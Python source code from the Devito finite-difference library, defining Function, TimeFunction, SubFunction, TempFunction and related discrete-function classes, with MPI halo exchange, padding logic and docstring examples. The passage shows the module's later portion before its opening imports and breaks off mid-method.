ffp = lambda f, i: FieldFromPointer("%s[%d]" % (f, i), self._C_symbol)
if region is DOMAIN:
offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, LEFT))
size = ffp(self._C_field_domain_size, self._C_make_index(dim))
elif region is OWNED:
if side is LEFT:
offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, LEFT))
size = ffp(self._C_field_halo_size, self._C_make_index(dim, RIGHT))
elif side is CENTER:
# Note: identical to region=HALO, side=CENTER
offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, LEFT))
size = ffp(self._C_field_domain_size, self._C_make_index(dim))
else:
offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, RIGHT))
size = ffp(self._C_field_halo_size, self._C_make_index(dim, LEFT))
elif region is HALO:
if side is LEFT:
offset = ffp(self._C_field_halo_ofs, self._C_make_index(dim, LEFT))
size = ffp(self._C_field_halo_size, self._C_make_index(dim, LEFT))
elif side is CENTER:
# Note: identical to region=OWNED, side=CENTER
offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, LEFT))
size = ffp(self._C_field_domain_size, self._C_make_index(dim))
else:
offset = ffp(self._C_field_halo_ofs, self._C_make_index(dim, RIGHT))
size = ffp(self._C_field_halo_size, self._C_make_index(dim, RIGHT))
elif region is NOPAD:
offset = ffp(self._C_field_halo_ofs, self._C_make_index(dim, LEFT))
size = ffp(self._C_field_nopad_size, self._C_make_index(dim))
elif region is FULL:
offset = 0
size = ffp(self._C_field_size, self._C_make_index(dim))
else:
raise ValueError("Unknown region `%s`" % str(region))
return RegionMeta(offset, size)
def _halo_exchange(self):
"""Perform the halo exchange with the neighboring processes."""
if not MPI.Is_initialized() or MPI.COMM_WORLD.size == 1:
# Nothing to do
return
if MPI.COMM_WORLD.size > 1 and self._distributor is None:
raise RuntimeError("`%s` cannot perform a halo exchange as it has "
"no Grid attached" % self.name)
neighborhood = self._distributor.neighborhood
comm = self._distributor.comm
for d in self._dist_dimensions:
for i in [LEFT, RIGHT]:
# Get involved peers
dest = neighborhood[d][i]
source = neighborhood[d][i.flip()]
# Gather send data
data = self._data_in_region(OWNED, d, i)
sendbuf = np.ascontiguousarray(data)
# Setup recv buffer
shape = self._data_in_region(HALO, d, i.flip()).shape
recvbuf = np.ndarray(shape=shape, dtype=self.dtype)
# Communication
comm.Sendrecv(sendbuf, dest=dest, recvbuf=recvbuf, source=source)
# Scatter received data
if recvbuf is not None and source != MPI.PROC_NULL:
self._data_in_region(HALO, d, i.flip())[:] = recvbuf
self._is_halo_dirty = False
@property
def _arg_names(self):
"""Tuple of argument names introduced by this function."""
return (self.name,)
def _arg_defaults(self, alias=None):
"""
A map of default argument values defined by this symbol.
Parameters
----------
alias : DiscreteFunction, optional
To bind the argument values to different names.
"""
key = alias or self
args = ReducerMap({key.name: self._data_buffer})
# Collect default dimension arguments from all indices
for i, s in zip(key.dimensions, self.shape):
args.update(i._arg_defaults(_min=0, size=s))
return args
def _arg_values(self, **kwargs):
"""
A map of argument values after evaluating user input. If no
user input is provided, return a default value.
Parameters
----------
**kwargs
Dictionary of user-provided argument overrides.
"""
# Add value override for own data if it is provided, otherwise
# use defaults
if self.name in kwargs:
new = kwargs.pop(self.name)
if isinstance(new, DiscreteFunction):
# Set new values and re-derive defaults
values = new._arg_defaults(alias=self).reduce_all()
else:
# We've been provided a pure-data replacement (array)
values = {self.name: new}
# Add value overrides for all associated dimensions
for i, s in zip(self.dimensions, new.shape):
size = s - sum(self._size_nodomain[i])
values.update(i._arg_defaults(size=size))
else:
values = self._arg_defaults(alias=self).reduce_all()
return values
def _arg_check(self, args, intervals):
"""
Check that ``args`` contains legal runtime values bound to ``self``.
Raises
------
InvalidArgument
If, given the runtime values ``args``, an out-of-bounds array
access would be performed, or if shape/dtype don't match with
self's shape/dtype.
"""
if self.name not in args:
raise InvalidArgument("No runtime value for `%s`" % self.name)
key = args[self.name]
if len(key.shape) != self.ndim:
raise InvalidArgument("Shape %s of runtime value `%s` does not match "
"dimensions %s" %
(key.shape, self.name, self.dimensions))
if key.dtype != self.dtype:
warning("Data type %s of runtime value `%s` does not match the "
"Function data type %s" % (key.dtype, self.name, self.dtype))
for i, s in zip(self.dimensions, key.shape):
i._arg_check(args, s, intervals[i])
def _arg_finalize(self, args, alias=None):
key = alias or self
return {key.name: self._C_make_dataobj(args[key.name])}
# Pickling support
_pickle_kwargs = AbstractFunction._pickle_kwargs +\
['grid', 'staggered', 'initializer']
class Function(DiscreteFunction):
"""
Tensor symbol representing a discrete function in symbolic equations.
A Function carries multi-dimensional data and provides operations to create
finite-differences approximations.
A Function encapsulates space-varying data; for data that also varies in time,
use TimeFunction instead.
Parameters
----------
name : str
Name of the symbol.
grid : Grid, optional
Carries shape, dimensions, and dtype of the Function. When grid is not
provided, shape and dimensions must be given. For MPI execution, a
Grid is compulsory.
space_order : int or 3-tuple of ints, optional
Discretisation order for space derivatives. Defaults to 1. ``space_order`` also
impacts the number of points available around a generic point of interest. By
default, ``space_order`` points are available on both sides of a generic point of
interest, including those nearby the grid boundary. Sometimes, fewer points
suffice; in other scenarios, more points are necessary. In such cases, instead of
an integer, one can pass a 3-tuple ``(o, lp, rp)`` indicating the discretization
order (``o``) as well as the number of points on the left (``lp``) and right
(``rp``) sides of a generic point of interest.
shape : tuple of ints, optional
Shape of the domain region in grid points. Only necessary if ``grid`` isn't given.
dimensions : tuple of Dimension, optional
Dimensions associated with the object. Only necessary if ``grid`` isn't given.
dtype : data-type, optional
Any object that can be interpreted as a numpy data type. Defaults
to ``np.float32``.
staggered : Dimension or tuple of Dimension or Stagger, optional
Define how the Function is staggered.
initializer : callable or any object exposing the buffer interface, optional
Data initializer. If a callable is provided, data is allocated lazily.
allocator : MemoryAllocator, optional
Controller for memory allocation. To be used, for example, when one wants
to take advantage of the memory hierarchy in a NUMA architecture. Refer to
`default_allocator.__doc__` for more information.
padding : int or tuple of ints, optional
.. deprecated:: shouldn't be used; padding is now automatically inserted.
Allocate extra grid points to maximize data access alignment. When a tuple
of ints, one int per Dimension should be provided.
Examples
--------
Creation
>>> from devito import Grid, Function
>>> grid = Grid(shape=(4, 4))
>>> f = Function(name='f', grid=grid)
>>> f
f(x, y)
>>> g = Function(name='g', grid=grid, space_order=2)
>>> g
g(x, y)
First-order derivatives through centered finite-difference approximations
>>> f.dx
Derivative(f(x, y), x)
>>> f.dy
Derivative(f(x, y), y)
>>> g.dx
Derivative(g(x, y), x)
>>> (f + g).dx
Derivative(f(x, y) + g(x, y), x)
First-order derivatives through left/right finite-difference approximations
>>> f.dxl
Derivative(f(x, y), x)
Note that the fact that it's a left-derivative isn't captured in the representation.
However, upon derivative expansion, this becomes clear
>>> f.dxl.evaluate
f(x, y)/h_x - f(x - h_x, y)/h_x
>>> f.dxr
Derivative(f(x, y), x)
Second-order derivative through centered finite-difference approximation
>>> g.dx2
Derivative(g(x, y), (x, 2))
Notes
-----
The parameters must always be given as keyword arguments, since SymPy
uses ``*args`` to (re-)create the dimension arguments of the symbolic object.
"""
is_Function = True
def _cache_meta(self):
# Attach additional metadata to self's cache entry
return {'nbytes': self.size}
def __init_finalize__(self, *args, **kwargs):
super(Function, self).__init_finalize__(*args, **kwargs)
# Space order
space_order = kwargs.get('space_order', 1)
if isinstance(space_order, int):
self._space_order = space_order
elif isinstance(space_order, tuple) and len(space_order) == 3:
self._space_order, _, _ = space_order
else:
raise TypeError("`space_order` must be int or 3-tuple of ints")
self._fd = self.__fd_setup__()
# Flag whether it is a parameter or a variable.
# Used at operator evaluation to evaluate the Function at the
# variable location (i.e. if the variable is staggered in x the
# parameter has to be computed at x + hx/2)
self._is_parameter = kwargs.get('parameter', False)
def __fd_setup__(self):
"""
Dynamically add derivative short-cuts.
"""
return generate_fd_shortcuts(self.dimensions, self.space_order)
@cached_property
def _fd_priority(self):
return 1 if self.staggered in [NODE, None] else 2
@property
def is_parameter(self):
return self._is_parameter
def _eval_at(self, func):
if not self.is_parameter or self.staggered == func.staggered:
return self
mapper = {self.indices_ref[d]: func.indices_ref[d]
for d in self.dimensions
if self.indices_ref[d] is not func.indices_ref[d]}
if mapper:
return self.subs(mapper)
return self
@classmethod
def __indices_setup__(cls, **kwargs):
grid = kwargs.get('grid')
dimensions = kwargs.get('dimensions')
if grid is None:
if dimensions is None:
raise TypeError("Need either `grid` or `dimensions`")
elif dimensions is None:
dimensions = grid.dimensions
# Staggered indices
staggered = kwargs.get("staggered", None)
if staggered in [CELL, NODE]:
staggered_indices = dimensions
else:
mapper = {d: d for d in dimensions}
for s in as_tuple(staggered):
c, s = s.as_coeff_Mul()
mapper.update({s: s + c * s.spacing/2})
staggered_indices = mapper.values()
return tuple(dimensions), tuple(staggered_indices)
@property
def is_Staggered(self):
return self.staggered is not None
@classmethod
def __shape_setup__(cls, **kwargs):
grid = kwargs.get('grid')
dimensions = kwargs.get('dimensions')
shape = kwargs.get('shape', kwargs.get('shape_global'))
if grid is None:
if shape is None:
raise TypeError("Need either `grid` or `shape`")
elif shape is None:
if dimensions is not None and dimensions != grid.dimensions:
raise TypeError("Need `shape` as not all `dimensions` are in `grid`")
shape = grid.shape_local
elif dimensions is None:
raise TypeError("`dimensions` required if both `grid` and "
"`shape` are provided")
else:
# Got `grid`, `dimensions`, and `shape`. We sanity-check that the
# Dimensions in `dimensions` also appearing in `grid` have same size
# (given by `shape`) as that provided in `grid`
if len(shape) != len(dimensions):
raise ValueError("`shape` and `dimensions` must have the "
"same number of entries")
loc_shape = []
for d, s in zip(dimensions, shape):
if d in grid.dimensions:
size = grid.dimension_map[d]
if size.glb != s and s is not None:
raise ValueError("Dimension `%s` is given size `%d`, "
"while `grid` says `%s` has size `%d` "
% (d, s, d, size.glb))
else:
loc_shape.append(size.loc)
else:
loc_shape.append(s)
shape = tuple(loc_shape)
return shape
def __halo_setup__(self, **kwargs):
halo = kwargs.get('halo')
if halo is not None:
return halo
else:
space_order = kwargs.get('space_order', 1)
if isinstance(space_order, int):
halo = (space_order, space_order)
elif isinstance(space_order, tuple) and len(space_order) == 3:
_, left_points, right_points = space_order
halo = (left_points, right_points)
else:
raise TypeError("`space_order` must be int or 3-tuple of ints")
return tuple(halo if i.is_Space else (0, 0) for i in self.dimensions)
def __padding_setup__(self, **kwargs):
padding = kwargs.get('padding')
if padding is None:
if kwargs.get('autopadding', configuration['autopadding']):
# Auto-padding
# 0-padding in all Dimensions except in the Fastest Varying Dimension,
# `fvd`, which is the innermost one
padding = [(0, 0) for i in self.dimensions[:-1]]
fvd = self.dimensions[-1]
# Let UB be a function that rounds up a value `x` to the nearest
# multiple of the SIMD vector length, `vl`
vl = configuration['platform'].simd_items_per_reg(self.dtype)
ub = lambda x: int(ceil(x / vl)) * vl
# Given the HALO and DOMAIN sizes, the right-PADDING is such that:
# * the `fvd` size is a multiple of `vl`
# * it contains *at least* `vl` points
# This way:
# * all first grid points along the `fvd` will be cache-aligned
# * there is enough room to round up the loop trip counts to maximize
# the effectiveness SIMD vectorization
fvd_pad_size = (ub(self._size_nopad[fvd]) - self._size_nopad[fvd]) + vl
padding.append((0, fvd_pad_size))
return tuple(padding)
else:
return tuple((0, 0) for d in self.dimensions)
elif isinstance(padding, int):
return tuple((0, padding) if d.is_Space else (0, 0) for d in self.dimensions)
elif isinstance(padding, tuple) and len(padding) == self.ndim:
return tuple((0, i) if isinstance(i, int) else i for i in padding)
else:
raise TypeError("`padding` must be int or %d-tuple of ints" % self.ndim)
@property
def space_order(self):
"""The space order."""
return self._space_order
def sum(self, p=None, dims=None):
"""
Generate a symbolic expression computing the sum of ``p`` points
along the spatial dimensions ``dims``.
Parameters
----------
p : int, optional
The number of summands. Defaults to the halo size.
dims : tuple of Dimension, optional
The Dimensions along which the sum is computed. Defaults to
``self``'s spatial dimensions.
"""
points = []
for d in (as_tuple(dims) or self.space_dimensions):
if p is None:
lp = self._size_inhalo[d].left
rp = self._size_inhalo[d].right
else:
lp = p // 2 + p % 2
rp = p // 2
indices = [d - i for i in range(lp, 0, -1)]
indices.extend([d + i for i in range(rp)])
points.extend([self.subs({d: i}) for i in indices])
return sum(points)
def avg(self, p=None, dims=None):
"""
Generate a symbolic expression computing the average of ``p`` points
along the spatial dimensions ``dims``.
Parameters
----------
p : int, optional
The number of summands. Defaults to the halo size.
dims : tuple of Dimension, optional
The Dimensions along which the average is computed. Defaults to
``self``'s spatial dimensions.
"""
tot = self.sum(p, dims)
return tot / len(tot.args)
# Pickling support
_pickle_kwargs = DiscreteFunction._pickle_kwargs +\
['space_order', 'shape_global', 'dimensions']
class TimeFunction(Function):
"""
Tensor symbol representing a discrete function in symbolic equations.
A TimeFunction carries multi-dimensional data and provides operations to create
finite-differences approximations, in both space and time.
A TimeFunction encapsulates space- and time-varying data.
Parameters
----------
name : str
Name of the symbol.
grid : Grid, optional
Carries shape, dimensions, and dtype of the Function. When grid is not
provided, shape and dimensions must be given. For MPI execution, a
Grid is compulsory.
space_order : int or 3-tuple of ints, optional
Discretisation order for space derivatives. Defaults to 1. ``space_order`` also
impacts the number of points available around a generic point of interest. By
default, ``space_order`` points are available on both sides of a generic point of
interest, including those nearby the grid boundary. Sometimes, fewer points
suffice; in other scenarios, more points are necessary. In such cases, instead of
an integer, one can pass a 3-tuple ``(o, lp, rp)`` indicating the discretization
order (``o``) as well as the number of points on the left (``lp``) and right
(``rp``) sides of a generic point of interest.
time_order : int, optional
Discretization order for time derivatives. Defaults to 1.
shape : tuple of ints, optional
Shape of the domain region in grid points. Only necessary if `grid` isn't given.
dimensions : tuple of Dimension, optional
Dimensions associated with the object. Only necessary if `grid` isn't given.
dtype : data-type, optional
Any object that can be interpreted as a numpy data type. Defaults
to `np.float32`.
save : int or Buffer, optional
By default, ``save=None``, which indicates the use of alternating buffers. This
enables cyclic writes to the TimeFunction. For example, if the TimeFunction
``u(t, x)`` has shape (3, 100), then, in an Operator, ``t`` will assume the
values ``1, 2, 0, 1, 2, 0, 1, ...`` (note that the very first value depends
on the stencil equation in which ``u`` is written.). The default size of the time
buffer when ``save=None`` is ``time_order + 1``. To specify a different size for
the time buffer, one should use the syntax ``save=Buffer(mysize)``.
Alternatively, if all of the intermediate results are required (or, simply, to
avoid using an alternating buffer), an explicit value for ``save`` ( an integer)
must be provided.
time_dim : Dimension, optional
TimeDimension to be used in the TimeFunction. Defaults to ``grid.time_dim``.
staggered : Dimension or tuple of Dimension or Stagger, optional
Define how the Function is staggered.
initializer : callable or any object exposing the buffer interface, optional
Data initializer. If a callable is provided, data is allocated lazily.
allocator : MemoryAllocator, optional
Controller for memory allocation. To be used, for example, when one wants
to take advantage of the memory hierarchy in a NUMA architecture. Refer to
`default_allocator.__doc__` for more information.
padding : int or tuple of ints, optional
.. deprecated:: shouldn't be used; padding is now automatically inserted.
Allocate extra grid points to maximize data access alignment. When a tuple
of ints, one int per Dimension should be provided.
Examples
--------
Creation
>>> from devito import Grid, TimeFunction
>>> grid = Grid(shape=(4, 4))
>>> f = TimeFunction(name='f', grid=grid)
>>> f
f(t, x, y)
>>> g = TimeFunction(name='g', grid=grid, time_order=2)
>>> g
g(t, x, y)
First-order derivatives through centered finite-difference approximations
>>> f.dx
Derivative(f(t, x, y), x)
>>> f.dt
Derivative(f(t, x, y), t)
>>> g.dt
Derivative(g(t, x, y), t)
When using the alternating buffer protocol, the size of the time dimension
is given by ``time_order + 1``
>>> f.shape
(2, 4, 4)
>>> g.shape
(3, 4, 4)
One can drop the alternating buffer protocol specifying a value for ``save``
>>> h = TimeFunction(name='h', grid=grid, save=20)
>>> h
h(time, x, y)
>>> h.shape
(20, 4, 4)
Notes
-----
The parameters must always be given as keyword arguments, since SymPy uses
``*args`` to (re-)create the dimension arguments of the symbolic object.
If the parameter ``grid`` is provided, the values for ``shape``,
``dimensions`` and ``dtype`` will be derived from it. When present, the
parameter ``shape`` should only define the spatial shape of the grid. The
temporal dimension will be inserted automatically as the leading dimension.
"""
is_TimeFunction = True
is_TimeDependent = True
_time_position = 0
"""Position of time index among the function indices."""
def __init_finalize__(self, *args, **kwargs):
self.time_dim = kwargs.get('time_dim', self.dimensions[self._time_position])
self._time_order = kwargs.get('time_order', 1)
super(TimeFunction, self).__init_finalize__(*args, **kwargs)
# Check we won't allocate too much memory for the system
available_mem = virtual_memory().available
if np.dtype(self.dtype).itemsize * self.size > available_mem:
warning("Trying to allocate more memory for symbol %s " % self.name +
"than available on physical device, this will start swapping")
if not isinstance(self.time_order, int):
raise TypeError("`time_order` must be int")
self.save = kwargs.get('save')
def __fd_setup__(self):
"""
Dynamically add derivative short-cuts.
"""
return generate_fd_shortcuts(self.dimensions, self.space_order,
to=self.time_order)
@classmethod
def __indices_setup__(cls, **kwargs):
dimensions = kwargs.get('dimensions')
staggered = kwargs.get('staggered')
if dimensions is None:
save = kwargs.get('save')
grid = kwargs.get('grid')
time_dim = kwargs.get('time_dim')
if time_dim is None:
time_dim = grid.time_dim if isinstance(save, int) else grid.stepping_dim
elif not (isinstance(time_dim, Dimension) and time_dim.is_Time):
raise TypeError("`time_dim` must be a time dimension")
dimensions = list(Function.__indices_setup__(**kwargs)[0])
dimensions.insert(cls._time_position, time_dim)
return Function.__indices_setup__(dimensions=dimensions, staggered=staggered)
@classmethod
def __shape_setup__(cls, **kwargs):
grid = kwargs.get('grid')
save = kwargs.get('save') or None # Force to None if 0/False/None/...
dimensions = kwargs.get('dimensions')
shape = kwargs.get('shape', kwargs.get('shape_global'))
time_order = kwargs.get('time_order', 1)
if grid is None:
if shape is None:
raise TypeError("Need either `grid` or `shape`")
if save is not None:
raise TypeError("Ambiguity detected: provide either `grid` and `save` "
"or just `shape` ")
elif shape is None:
shape = list(grid.shape_local)
if save is None:
shape.insert(cls._time_position, time_order + 1)
elif isinstance(save, Buffer):
shape.insert(cls._time_position, save.val)
elif isinstance(save, int):
shape.insert(cls._time_position, save)
else:
raise TypeError("`save` can be None, int or Buffer, not %s" % type(save))
elif dimensions is None:
raise TypeError("`dimensions` required if both `grid` and "
"`shape` are provided")
else:
shape = super(TimeFunction, cls).__shape_setup__(
grid=grid, shape=shape, dimensions=dimensions
)
return tuple(shape)
@cached_property
def _fd_priority(self):
return 2.1 if self.staggered in [NODE, None] else 2.2
@property
def time_order(self):
"""The time order."""
return self._time_order
@property
def forward(self):
"""Symbol for the time-forward state of the TimeFunction."""
i = int(self.time_order / 2) if self.time_order >= 2 else 1
_t = self.dimensions[self._time_position]
return self._subs(_t, _t + i * _t.spacing)
@property
def backward(self):
"""Symbol for the time-backward state of the TimeFunction."""
i = int(self.time_order / 2) if self.time_order >= 2 else 1
_t = self.dimensions[self._time_position]
return self._subs(_t, _t - i * _t.spacing)
@property
def _time_size(self):
return self.shape_allocated[self._time_position]
@property
def time_size(self):
return self._time_size
@property
def _time_buffering(self):
return not is_integer(self.save)
@property
def _time_buffering_default(self):
return self._time_buffering and not isinstance(self.save, Buffer)
def _arg_check(self, args, intervals):
super(TimeFunction, self)._arg_check(args, intervals)
key_time_size = args[self.name].shape[self._time_position]
if self._time_buffering and self._time_size != key_time_size:
raise InvalidArgument("Expected `time_size=%d` for runtime "
"value `%s`, found `%d` instead"
% (self._time_size, self.name, key_time_size))
# Pickling support
_pickle_kwargs = Function._pickle_kwargs + ['time_order', 'save', 'time_dim']
class SubFunction(Function):
"""
A Function bound to a "parent" DiscreteFunction.
A SubFunction hands control of argument binding and halo exchange to its
parent DiscreteFunction.
"""
def __init_finalize__(self, *args, **kwargs):
super(SubFunction, self).__init_finalize__(*args, **kwargs)
self._parent = kwargs['parent']
def __padding_setup__(self, **kwargs):
# SubFunctions aren't expected to be used in time-consuming loops
return tuple((0, 0) for i in range(self.ndim))
def _halo_exchange(self):
return
def _arg_values(self, **kwargs):
if self.name in kwargs:
raise RuntimeError("`%s` is a SubFunction, so it can't be assigned "
"a value dynamically" % self.name)
else:
return self._parent._arg_defaults(alias=self._parent).reduce_all()
@property
def parent(self):
return self._parent
_pickle_kwargs = Function._pickle_kwargs + ['parent']
class TempFunction(DiscreteFunction):
"""
Tensor symbol used to store an intermediate sub-expression extracted from
one or more symbolic equations.
Users should not instantiate this class directly. TempFunctions may be created
by Devito to store intermediate sub-expressions ("temporary values") when the
user supplies the `cire-ftemps` option to an Operator.
Unlike other DiscreteFunction types, TempFunctions do not carry data directly.
However, they can generate Functions to override the TempFunction at Operator
application time (see the Examples section below).
TempFunctions are useful if the user wants to retain control over the allocation
and deletion of temporary storage (by default, instead, Devito uses Arrays, which
are allocated and deallocated upon entering and exiting C-land, respectively).
Examples
--------
The `make` method makes the TempFunction create a new Function. For more info,
refer to TempFunction.make.__doc__.
.. code-block:: python
op = Operator(...)
cfuncs = [i for i in op.input if i.is_TempFunction]
kwargs = {i.name: i.make(grid.shape) for i in cfuncs}
op.apply(..., **kwargs)
"""
is_TempFunction = True
def __init_finalize__(self, *args, **kwargs):
super().__init_finalize__(*args, **kwargs)
self._pointer_dim = kwargs.get('pointer_dim')
@classmethod
def __indices_setup__(cls, **kwargs):
pointer_dim = kwargs.get('pointer_dim')
dimensions = as_tuple(kwargs['dimensions'])
if pointer_dim not in dimensions:
# This is a bit hacky but it does work around duplicate dimensions when
# it gets to pickling
dimensions = as_tuple(pointer_dim) + dimensions
# Sanity check
assert not any(d.is_NonlinearDerived for d in dimensions)
return dimensions, dimensions
def __halo_setup__(self, **kwargs):
pointer_dim = kwargs.get('pointer_dim')
dimensions = as_tuple(kwargs['dimensions'])
halo = as_tuple(kwargs.get('halo'))
if halo is None:
halo = tuple((0, 0) for _ in dimensions)
if pointer_dim is not None and pointer_dim not in dimensions:
halo = ((0, 0),) + as_tuple(halo)
return halo
@property
def data(self):
# Any attempt at allocating data by the user should fail miserably
raise TypeError("TempFunction cannot allocate data")
data_domain = data
data_with_halo = data
data_ro_domain = data
data_ro_with_halo = data
@property
def pointer_dim(self):
return self._pointer_dim
@property
def dim(self):
return self.pointer_dim
@property
def shape(self):
domain = [i.symbolic_size for i in self.dimensions]
return DimensionTuple(*domain, getters=self.dimensions)
@property
def shape_with_halo(self):
domain = self.shape
halo = [sympy.Add(*i, evaluate=False) for i in self._size_halo]
ret = tuple(sum(i) for i in zip(domain, halo))
return DimensionTuple(*ret, getters=self.dimensions)
shape_allocated = DiscreteFunction.symbolic_shape
def make(self, shape=None, initializer=None, allocator=None, **kwargs):
"""
Create a Function which can be used to override this TempFunction
in a call to `op.apply(...)`.
Parameters
----------
shape : tuple of ints, optional
Shape of the domain region in grid points.
initializer : callable or any object exposing the buffer interface, optional
Data initializer. If a callable is provided, data is allocated lazily.
allocator : MemoryAllocator, optional
Controller for memory allocation. To be used, for example, when one wants
to take advantage of the memory hierarchy in a NUMA architecture. Refer to
`default_allocator.__doc__` for more information.
**kwargs
Mapper of Operator overrides. Used to automatically derive the shape
if not explicitly provided.
"""
if shape is None:
if len(kwargs) == 0:
raise ValueError("Either `shape` or `kwargs` (Operator overrides) "
"must be provided.")
shape = []
for n, i in enumerate(self.shape):
v = i.subs(kwargs)
if not v.is_Integer:
raise ValueError("Couldn't resolve `shape[%d]=%s` with the given "
"kwargs (obtained: `%s`)" % (n, i, v))
shape.append(int(v))
shape = tuple(shape)
elif len(shape) != self.ndim:
raise ValueError("`shape` must contain %d integers, not %d"
% (self.ndim, len(shape)))
elif not all(is_integer(i) for i in shape):
raise ValueError("`shape` must contain integers (got `%s`)" % str(shape))
return Function(name=self.name, dtype=self.dtype, dimensions=self.dimensions,
shape=shape, halo=self.halo, initializer=initializer,
allocator=allocator)
def _make_pointer(self, dim):
return TempFunction(name='p%s' % self.name, dtype=self.dtype, pointer_dim=dim,
dimensions=self.dimensions, halo=self.halo)
def _arg_defaults(self, alias=None):
raise RuntimeError("TempFunction does not have default arguments ")
def _arg_values(self, **kwargs):
if self.name in kwargs:
new = kwargs.pop(self.name)
if isinstance(new, DiscreteFunction):
# Set new values and re-derive defaults
return new._arg_defaults().reduce_all()
else:
raise InvalidArgument("Illegal runtime value for `%s`" % self.name)
else:
raise InvalidArgument("TempFunction `%s` lacks override" % self.name)
# Pickling support
_pickle_kwargs = DiscreteFunction._pickle_kwargs + ['dimensions', 'pointer_dim']
class AliasFunction(DiscreteFunction):
"""
Tensor symbol that "aliases" another DiscreteFunction. Aliasing here means that
the AliasFunction logically represents another object. This is most commonly used
when we have a generic routine `foo(af, ...)` that we need to apply to multiple
DiscreteFunctions; here `af` is an AliasFunction, used in the body of `foo`.
Like a TempFunction, an AliasFunction does not carry data.
"""
__indices_setup__ = Function.__indices_setup__
__shape_setup__ = Function.__shape_setup__
@property
def _mem_mapped(self):
return False
@property
def data(self):
# Any attempt at allocating data by the user should fail miserably
raise TypeError("AliasFunction cannot allocate data")
data_domain = data
data_with_halo = data
data_ro_domain = data
data_ro_with_halo = data
|
from collections import namedtuple
from ctypes import POINTER, Structure, c_void_p, c_int, cast, byref
from functools import wraps, reduce
from math import ceil
from operator import mul
import numpy as np
import sympy
from psutil import virtual_memory
from cached_property import cached_property
from cgen import Struct, Value
from devito.builtins import assign
from devito.data import (DOMAIN, OWNED, HALO, NOPAD, FULL, LEFT, CENTER, RIGHT,
Data, default_allocator)
from devito.exceptions import InvalidArgument
from devito.logger import debug, warning
from devito.mpi import MPI
from devito.parameters import configuration
from devito.symbolics import FieldFromPointer
from devito.finite_differences import Differentiable, generate_fd_shortcuts
from devito.tools import (ReducerMap, as_tuple, flatten, is_integer,
ctypes_to_cstr, memoized_meth, dtype_to_ctype)
from devito.types.dimension import Dimension
from devito.types.args import ArgProvider
from devito.types.caching import CacheManager
from devito.types.basic import AbstractFunction, Size
from devito.types.utils import Buffer, DimensionTuple, NODE, CELL
__all__ = ['Function', 'TimeFunction', 'SubFunction', 'TempFunction']
RegionMeta = namedtuple('RegionMeta', 'offset size')
class DiscreteFunction(AbstractFunction, ArgProvider, Differentiable):
"""
Tensor symbol representing a discrete function in symbolic equations.
Unlike an Array, a DiscreteFunction carries data.
Notes
-----
Users should not instantiate this class directly. Use Function or
SparseFunction (or their subclasses) instead.
"""
# Required by SymPy, otherwise the presence of __getitem__ will make SymPy
# think that a DiscreteFunction is actually iterable, thus breaking many of
# its key routines (e.g., solve)
_iterable = False
is_Input = True
is_DiscreteFunction = True
_DataType = Data
"""
The type of the underlying data object.
"""
def __init_finalize__(self, *args, **kwargs):
# A `Distributor` to handle domain decomposition (only relevant for MPI)
self._distributor = self.__distributor_setup__(**kwargs)
# Staggering metadata
self._staggered = self.__staggered_setup__(**kwargs)
# Now that *all* __X_setup__ hooks have been called, we can let the
# superclass constructor do its job
super(DiscreteFunction, self).__init_finalize__(*args, **kwargs)
# There may or may not be a `Grid` attached to the DiscreteFunction
self._grid = kwargs.get('grid')
# Symbolic (finite difference) coefficients
self._coefficients = kwargs.get('coefficients', 'standard')
if self._coefficients not in ('standard', 'symbolic'):
raise ValueError("coefficients must be `standard` or `symbolic`")
# Data-related properties and data initialization
self._data = None
self._first_touch = kwargs.get('first_touch', configuration['first-touch'])
self._allocator = kwargs.get('allocator') or default_allocator()
initializer = kwargs.get('initializer')
if initializer is None or callable(initializer):
# Initialization postponed until the first access to .data
self._initializer = initializer
elif isinstance(initializer, (np.ndarray, list, tuple)):
# Allocate memory and initialize it. Note that we do *not* hold
# a reference to the user-provided buffer
self._initializer = None
if len(initializer) > 0:
self.data_with_halo[:] = initializer
else:
# This is a corner case -- we might get here, for example, when
# running with MPI and some processes get 0-size arrays after
# domain decomposition. We touch the data anyway to avoid the
# case ``self._data is None``
self.data
else:
raise ValueError("`initializer` must be callable or buffer, not %s"
% type(initializer))
def __eq__(self, other):
# The only possibility for two DiscreteFunctions to be considered equal
# is that they are indeed the same exact object
return self is other
def __hash__(self):
return id(self)
_subs = Differentiable._subs
def _allocate_memory(func):
"""Allocate memory as a Data."""
@wraps(func)
def wrapper(self):
if self._data is None:
debug("Allocating memory for %s%s" % (self.name, self.shape_allocated))
# Clear up both SymPy and Devito caches to drop unreachable data
CacheManager.clear(force=False)
# Allocate the actual data object
self._data = self._DataType(self.shape_allocated, self.dtype,
modulo=self._mask_modulo,
allocator=self._allocator,
distributor=self._distributor)
# Initialize data
if self._first_touch:
assign(self, 0)
if callable(self._initializer):
if self._first_touch:
warning("`first touch` together with `initializer` causing "
"redundant data initialization")
try:
self._initializer(self.data_with_halo)
except ValueError:
# Perhaps user only wants to initialise the physical domain
self._initializer(self.data)
else:
self.data_with_halo.fill(0)
return func(self)
return wrapper
@classmethod
def __dtype_setup__(cls, **kwargs):
grid = kwargs.get('grid')
dtype = kwargs.get('dtype')
if dtype is not None:
return dtype
elif grid is not None:
return grid.dtype
else:
return np.float32
def __staggered_setup__(self, **kwargs):
"""
Setup staggering-related metadata. This method assigns:
* 0 to non-staggered dimensions;
* 1 to staggered dimensions.
"""
staggered = kwargs.get('staggered', None)
if staggered is CELL:
staggered = self.dimensions
return staggered
def __distributor_setup__(self, **kwargs):
grid = kwargs.get('grid')
# There may or may not be a `Distributor`. In the latter case, the
# DiscreteFunction is to be considered "local" to each MPI rank
return kwargs.get('distributor') if grid is None else grid.distributor
@cached_property
def _functions(self):
return {self.function}
@property
def _data_buffer(self):
"""
Reference to the data. Unlike :attr:`data` and :attr:`data_with_halo`,
this *never* returns a view of the data. This method is for internal use only.
"""
return self._data_allocated
@property
def _data_alignment(self):
return self._allocator.guaranteed_alignment
@property
def _mem_external(self):
return True
@property
def grid(self):
"""The Grid on which the discretization occurred."""
return self._grid
@property
def staggered(self):
return self._staggered
@property
def coefficients(self):
"""Form of the coefficients of the function."""
return self._coefficients
@cached_property
def _coeff_symbol(self):
if self.coefficients == 'symbolic':
return sympy.Function('W')
else:
raise ValueError("Function was not declared with symbolic "
"coefficients.")
@cached_property
def shape(self):
"""
